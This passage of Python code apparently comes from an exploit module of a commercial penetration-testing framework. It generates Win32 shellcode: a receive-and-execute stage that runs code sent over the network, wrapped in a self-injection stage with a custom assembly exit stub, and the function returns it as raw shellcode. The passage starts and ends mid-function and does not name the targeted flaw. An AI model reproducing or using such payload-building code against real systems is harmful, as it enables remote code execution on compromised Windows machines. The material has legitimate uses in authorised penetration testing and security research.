sc.addAttr("loadFDasreg", {"reg": "esi"})
sc.addAttr("RecvExecDepSafe", None) #MOSDEF
sc.addAttr("ExitProcess", None)
proxy_payload = sc.get()
# Here we use a shellcode with a custom exit stub
ending_shellcode = "andl $0xffffff00,%ebx\n"
ending_shellcode += "jmp %ebx"
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0})
sc.addAttr(
"InjectToSelf", {
"injectme": proxy_payload,
"DONTEXIT": True,
'customexit': ending_shellcode
})
rawshellcode = sc.get()
return rawshellcode
